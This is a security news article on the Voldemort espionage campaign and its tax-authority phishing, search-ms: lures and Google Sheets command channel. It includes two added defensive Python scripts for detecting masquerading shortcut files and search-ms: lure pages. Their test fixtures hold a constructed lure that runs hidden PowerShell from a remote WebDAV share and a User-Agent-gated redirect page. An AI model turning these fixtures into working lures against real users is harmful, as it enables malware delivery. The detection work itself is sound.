Cybersecurity researchers have uncovered a novel malware campaign that abuses Google Sheets as a command-and-control (C2) channel. The activity, first detected by Proofpoint on August 5, 2024, impersonates tax authorities from governments across Europe, Asia, and the U.S., and targets more than 70 organizations worldwide with a bespoke tool named Voldemort that is designed to gather information and deliver additional payloads.
The targeted sectors are diverse, including insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations. The suspected cyber espionage campaign has not been attributed to a specific named threat actor, but it has sent as many as 20,000 email messages as part of the attacks.
The emails claim to be from tax authorities in the U.S., the U.K., France, Germany, Italy, India, and Japan, alerting recipients about changes to their tax filings and urging them to click on Google AMP Cache URLs that redirect users to an intermediate landing page.
According to Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson, the landing page inspects the User-Agent string to determine whether the visitor is running Windows. If so, the page invokes the search-ms: URI protocol handler, which opens a Windows Explorer search window whose results are populated from a location the attacker specifies, to present a Windows shortcut (LNK) file. The shortcut carries an Adobe Acrobat Reader icon so that it passes for a PDF, in an attempt to trick the victim into launching it.
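The shortcut masquerade described above is something a responder can check for mechanically: a .lnk file's icon location says what the file pretends to be, while its target path and arguments say what it actually runs. The following Python script is an added example, not code from Proofpoint or from the campaign. It parses the ShellLinkHeader and StringData sections of a shortcut as laid out in Microsoft's MS-SHLLINK specification, builds two constructed shortcuts for demonstration, and flags the one whose Acrobat icon hides a PowerShell target on a remote share. The file paths, the 203.0.113.5 address, and the icon and script-host marker lists are assumptions chosen for illustration.

```python
import struct

# LinkFlags bits from MS-SHLLINK section 2.1.1 (only the ones this parser needs).
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# CLSID 00021401-0000-0000-C000-000000000046 as stored (little-endian) in every .lnk header.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumed marker lists: substrings that make an icon look like a document, and
# substrings that identify a script or command host as the real target.
DOCUMENT_ICON_MARKERS = ("acrord32", "acrobat", ".pdf", "winword", "excel")
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta",
                "python", "rundll32", "regsvr32")


def parse_lnk(data: bytes) -> dict:
    """Extract the StringData fields (target, arguments, icon) from a shell link."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Windows shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index = struct.unpack_from("<i", data, 56)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize counts its own 4 bytes
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"icon_index": icon_index}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def assess_lnk(data: bytes) -> dict:
    """Flag a shortcut whose icon says 'document' while its target says 'script host'."""
    info = parse_lnk(data)
    icon = info.get("icon_location", "").lower()
    launch = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    reasons = []
    if any(m in icon for m in DOCUMENT_ICON_MARKERS) and any(h in launch for h in SCRIPT_HOSTS):
        reasons.append("document-style icon but the target is a script/command host")
    if "\\\\" in launch or "://" in launch:    # UNC or WebDAV-style remote path
        reasons.append("target or arguments reference a remote share")
    return {"suspicious": bool(reasons), "reasons": reasons, "fields": info}


def build_lnk(relative_path: str, arguments: str, icon_location: str, name: str = "") -> bytes:
    """Assemble a minimal Unicode .lnk (header + StringData only) for testing; constructed, not a real sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    if name:
        flags |= HAS_NAME
    header = struct.pack("<I16sIIQQQIiIH2sII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, b"\0\0", 0, 0)
    body = b""
    for text in ([name] if name else []) + [relative_path, arguments, icon_location]:
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples (not artifacts from the campaign): a lure with an Acrobat icon that
# runs PowerShell against a WebDAV share, and an honest shortcut that opens Acrobat itself.
LURE_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"-WindowStyle Hidden -File \\203.0.113.5@80\share\run.ps1",
    r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
    name="Tax filing notice.pdf",
)
BENIGN_LNK = build_lnk(
    r"..\..\..\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
    "",
    r"%ProgramFiles%\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
)

if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        verdict = assess_lnk(blob)
        print(label, "SUSPICIOUS" if verdict["suspicious"] else "clean", verdict["reasons"])
```

Run it on a real shortcut with `assess_lnk(open(path, "rb").read())`. The parser deliberately skips the LinkTargetIDList and LinkInfo blocks rather than decoding them, so a shortcut that stores its target only in the IDList (no RELATIVE_PATH string) will come back with an empty launch string; for triage of phishing lures that is acceptable, since the masquerade relies on the icon string and the arguments, but a full forensic tool would decode those blocks too.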
Proofpoint described the activity as aligned with advanced persistent threat (APT) tradecraft but carrying "cybercrime vibes," given its use of techniques popular in the e-crime landscape. The researchers also noted that the search-ms: lure technique is increasingly common among malware families that serve as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.
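For hunting the search-ms: lure itself, whether in this campaign's landing pages or in the Latrodectus, DarkGate, and XWorm deliveries mentioned above, the useful artifact is the `crumb=location:` parameter, which tells the handler which folder or share to list, and which in a lure is typically a UNC path to an attacker-controlled SMB or WebDAV server. The Python below is an added example, not code from the original article or from Proofpoint: it extracts search-ms: URIs from a constructed landing page that performs the User-Agent gate described earlier, parses their parameters, and flags any location crumb that is a remote path. The sample page, the 203.0.113.5@80 WebDAV share, and the parameter handling are assumptions based on the documented search-ms: syntax.

```python
import re
from urllib.parse import unquote

# A search-ms: URI is "search-ms:" followed by &-separated key=value pairs. The handler
# opens Explorer and searches the folder named by "crumb=location:..."; "\\host\share"
# (SMB) or "\\host@80\share" (WebDAV mini-redirector syntax) point at a remote server.
SEARCH_MS_RE = re.compile(r"""search-ms:[^\s"'<>]+""", re.IGNORECASE)


def parse_search_ms(uri: str) -> dict:
    """Split a search-ms: URI into parameters; crumb may repeat, so every value is a list."""
    params = {}
    for part in uri.split(":", 1)[1].split("&"):
        key, _, value = part.partition("=")
        if key:
            params.setdefault(key.lower(), []).append(unquote(value))
    return params


def remote_locations(params: dict) -> list:
    """Return location crumbs that name a remote share rather than a local folder."""
    found = []
    for crumb in params.get("crumb", []):
        if crumb.lower().startswith("location:"):
            location = crumb[len("location:"):]
            if location.startswith("\\\\") or location.startswith("//"):
                found.append(location)
    return found


def find_search_ms_lures(page: str) -> list:
    """Scan a landing page or email body for search-ms: URIs and flag remote locations."""
    # Only "&amp;" is decoded; a full HTML unescape would mangle parameter names that
    # happen to share a prefix with legacy entities (e.g. "&copy=").
    text = page.replace("&amp;", "&")
    findings = []
    for match in SEARCH_MS_RE.finditer(text):
        uri = match.group(0)
        params = parse_search_ms(uri)
        remote = remote_locations(params)
        findings.append({
            "uri": uri,
            "display_name": params.get("displayname", [""])[0],
            "remote_locations": remote,
            "suspicious": bool(remote),
        })
    return findings


# Constructed landing page (not a capture from the campaign): the User-Agent gate the
# article describes, sending Windows visitors to a search-ms: URI whose crumb is a WebDAV
# share on a documentation-range address, plus a harmless local search link for contrast.
SAMPLE_LANDING_PAGE = r"""
<html><body>
<script>
if (navigator.userAgent.indexOf("Windows") !== -1) {
  window.location.href = "search-ms:query=Tax%20Return&crumb=location:\\203.0.113.5@80\docs&displayname=Downloads";
} else {
  window.location.href = "https://example.com/404";
}
</script>
<a href="search-ms:query=invoice&amp;crumb=location:C:\Users\Public\Documents&amp;displayname=Local">local search</a>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_search_ms_lures(SAMPLE_LANDING_PAGE):
        flag = "SUSPICIOUS" if hit["suspicious"] else "ok"
        print(flag, hit["display_name"], hit["remote_locations"] or "(local)")
```

The `displayname` value is worth recording alongside the remote host: it is the title the victim sees on the Explorer window (here "Downloads"), and lures choose it to make the remote listing look like a local folder. Feed the same function a saved email body or proxy log line to find the URIs before the landing page is ever rendered.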
Proofpoint characterized the campaign as unusual, raising the possibility that the threat actors cast a wide net before zeroing in on a small pool of targets. It is also possible that the attackers, who likely have varying levels of technical expertise, intended to infect several organizations.
"While many of the campaign characteristics align with cybercriminal threat activity, we assess this is likely espionage activity conducted to support as yet unknown final objectives," the researchers said. "The Frankensteinian amalgamation of clever and sophisticated capabilities, paired with very basic techniques and functionality, makes it difficult to assess the level of the threat actor's capability and determine with high confidence the ultimate goals of the campaign."
This development comes as Netskope Threat Labs uncovered an updated version of the Latrodectus malware (version 1.4) that comes with a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.
"Latrodectus has been evolving pretty fast, adding new features to its payload," security researcher Leandro Fróes said. "The understanding of the updates applied to its payload allows defenders to keep automated pipelines properly set as well as use the information for further hunting for new variants."